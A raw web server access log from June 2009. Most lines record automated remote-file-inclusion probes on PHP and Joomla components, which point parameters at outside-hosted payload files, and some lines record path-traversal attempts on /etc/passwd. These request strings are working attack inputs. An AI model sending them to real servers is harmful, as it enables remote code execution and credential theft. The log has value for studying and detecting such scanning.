69.64.52.15 - - [15/Jun/2009:01:29:06 -0400] "GET /logs/index.php?DOCUMENT_ROOT=http://www.rollingdogranch.net/images/uploads/de/l333tbi1tX.txt????? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.230.22.39 - - [15/Jun/2009:01:29:23 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:29:23 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:29:23 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:01:29:38 -0400] "GET /logs/access_log.Q109052800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.54.154.10 - - [15/Jun/2009:01:29:56 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:29:56 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:29:56 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.64.52.15 - - [15/Jun/2009:01:30:04 -0400] "GET /logs/error_log.Q108110600/index.php?DOCUMENT_ROOT=http://www.rollingdogranch.net/images/uploads/de/l333tbi1tX.txt????? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.203.180.144 - - [15/Jun/2009:01:30:19 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
211.203.180.144 - - [15/Jun/2009:01:30:19 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
65.23.158.226 - - [15/Jun/2009:01:30:41 -0400] "GET /logs/access_log.Q109060100//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
75.145.152.113 - - [15/Jun/2009:01:30:42 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:30:42 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:30:42 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:30:42 -0400] "GET /logs/access_log.Q109060600//modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.150.9.236 - - [15/Jun/2009:01:30:43 -0400] "GET /logs/access_log.Q109050900//main.php?basepath=http://www.brunoramalho.com/idkobra.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.150.9.236 - - [15/Jun/2009:01:30:43 -0400] "GET //main.php?basepath=http://www.brunoramalho.com/idkobra.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
200.150.9.236 - - [15/Jun/2009:01:30:44 -0400] "GET /logs//main.php?basepath=http://www.brunoramalho.com/idkobra.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
87.230.22.39 - - [15/Jun/2009:01:30:57 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:31:15 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:31:19 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.95.252.16 - - [15/Jun/2009:01:31:22 -0400] "HEAD /icons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
204.3.160.214 - - [15/Jun/2009:01:31:52 -0400] "GET //BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:31:52 -0400] "GET /logs/access_log.Q109053100%20%20//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:31:52 -0400] "GET /logs//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:31:55 -0400] "GET //BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 218 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:31:55 -0400] "GET /logs/access_log.Q109053100%20%20//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:31:55 -0400] "GET /logs//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 223 "-" "Mozilla/5.0"
216.120.237.150 - - [15/Jun/2009:01:32:03 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
204.3.160.214 - - [15/Jun/2009:01:32:56 -0400] "GET /logs/access_log.Q109050300%20%20//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:32:57 -0400] "GET /logs/access_log.Q109050300%20%20//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 247 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:33:12 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.145.152.113 - - [15/Jun/2009:01:33:13 -0400] "GET /logs/access_log.Q109060600%20%20//modules/vwar/admin/admin.php?vwar_root=http://buminch.org/bbs/fx29id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.150.9.236 - - [15/Jun/2009:01:34:04 -0400] "GET /logs/access_log.Q109050900//main.php?basepath=http://www.brunoramalho.com/idpriv8.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jun/2009:01:34:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.150.9.236 - - [15/Jun/2009:01:34:34 -0400] "GET /logs/access_log.Q109060800//main.php?basepath=http://www.brunoramalho.com/idpriv8.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.25.112.18 - - [15/Jun/2009:01:34:39 -0400] "GET /logs/access_log.Q109060900/index.php?_SERVER[DOCUMENT_ROOT]=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.25.112.18 - - [15/Jun/2009:01:34:39 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
81.25.112.18 - - [15/Jun/2009:01:34:57 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
81.25.112.18 - - [15/Jun/2009:01:34:58 -0400] "GET /logs/access_log.Q109060800/index.php?_SERVER[DOCUMENT_ROOT]=http://old.rupor.info/oye.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.150.9.236 - - [15/Jun/2009:01:35:46 -0400] "GET /logs/access_log.Q109060800//main.php?basepath=http://www.brunoramalho.com/idkobra.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.230.22.39 - - [15/Jun/2009:01:35:49 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:01:35:53 -0400] "GET /logs/access_log.Q109052400//component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:35:58 -0400] "GET //component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:36:04 -0400] "GET /logs//component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:37:45 -0400] "GET /logs/access_log.Q109052400//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:37:50 -0400] "GET //component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
190.54.28.163 - - [15/Jun/2009:01:37:55 -0400] "GET /logs//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 316 "-" "libwww-perl/5.805"
204.3.160.214 - - [15/Jun/2009:01:38:54 -0400] "GET /logs/access_log.Q109053100//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:39:00 -0400] "GET /logs/access_log.Q109051600//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:01:39:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.3.160.214 - - [15/Jun/2009:01:39:07 -0400] "GET /logs/access_log.Q109053100//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:01:39:07 -0400] "GET /logs/access_log.Q109051600//BaseAdmin.class.php?_CONF%5Bpath%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
64.72.127.30 - - [15/Jun/2009:01:39:08 -0400] "GET /logs///components/com_simpleboard/image_upload.php?sbp=../../../../../../../../etc/passwd HTTP/1.0" 404 248 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
64.72.127.30 - - [15/Jun/2009:01:39:08 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
95.154.216.25 - - [15/Jun/2009:01:39:35 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:39:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:39:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
151.1.154.24 - - [15/Jun/2009:01:42:03 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
151.1.154.24 - - [15/Jun/2009:01:42:03 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
151.1.154.24 - - [15/Jun/2009:01:42:47 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [15/Jun/2009:01:44:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [15/Jun/2009:01:45:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5CB2A400188F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.239.150.144 - - [15/Jun/2009:01:45:26 -0400] "GET /phphtml.php?htmlclass_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:01:45:26 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:01:45:26 -0400] "GET /logs/phphtml.php?htmlclass_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.249.71.14 - - [15/Jun/2009:01:45:28 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [15/Jun/2009:01:45:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5BF25400168F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [15/Jun/2009:01:45:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5C6224001B8F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [15/Jun/2009:01:45:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5C126400168F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [15/Jun/2009:01:45:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5C42B400158F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [15/Jun/2009:01:46:08 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L10855C4C5C921400158F04E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
151.1.154.24 - - [15/Jun/2009:01:46:47 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
211.239.150.144 - - [15/Jun/2009:01:48:37 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:48:38 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:48:38 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:48:39 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:01:48:53 -0400] "GET /logs/access_log.Q109052200//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jun/2009:01:49:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.54.154.10 - - [15/Jun/2009:01:50:22 -0400] "GET /logs/access_log.Q109060600/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [15/Jun/2009:01:50:45 -0400] "GET /images/nav_store_head.jpg HTTP/1.1" 200 1953 "-" "Googlebot-Image/1.0"
87.230.22.39 - - [15/Jun/2009:01:50:50 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:50:50 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:50:50 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:01:50:50 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:01:51:37 -0400] "GET /logs/access_log.Q109053100//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:01:51:37 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:01:51:40 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.239.150.144 - - [15/Jun/2009:01:51:51 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.0.165 - - [15/Jun/2009:01:52:11 -0400] "GET /logs///popup_window.php?site_isp_root=../../../../../../../../etc/passwd HTTP/1.0" 404 221 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
91.121.0.165 - - [15/Jun/2009:01:52:11 -0400] "GET /logs//popup_window.php?site_isp_root=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 220 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
200.54.154.10 - - [15/Jun/2009:01:52:43 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:52:43 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:52:44 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:01:53:22 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:53:22 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:53:22 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:01:54:03 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:54:03 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:54:03 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
200.54.154.10 - - [15/Jun/2009:01:54:04 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:01:54:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.54.140 - - [15/Jun/2009:01:54:08 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:54:08 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:54:08 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
151.1.154.24 - - [15/Jun/2009:01:54:14 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.54.154.10 - - [15/Jun/2009:01:54:31 -0400] "GET /logs/access_log.Q109060600%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:01:54:32 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:54:32 -0400] "GET //include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:54:32 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
95.154.216.25 - - [15/Jun/2009:01:54:33 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
200.54.154.10 - - [15/Jun/2009:01:54:38 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.72.127.30 - - [15/Jun/2009:01:55:01 -0400] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 261 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
64.72.127.30 - - [15/Jun/2009:01:55:01 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
84.253.17.248 - - [15/Jun/2009:01:55:46 -0400] "GET /logs/access_log.Q108080500 HTTP/1.1" 404 224 "http://www.google.ch/search?hl=de&q=210.255.76.253&btnG=Suche&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
70.38.54.140 - - [15/Jun/2009:01:55:48 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:55:50 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
151.1.154.24 - - [15/Jun/2009:01:56:21 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
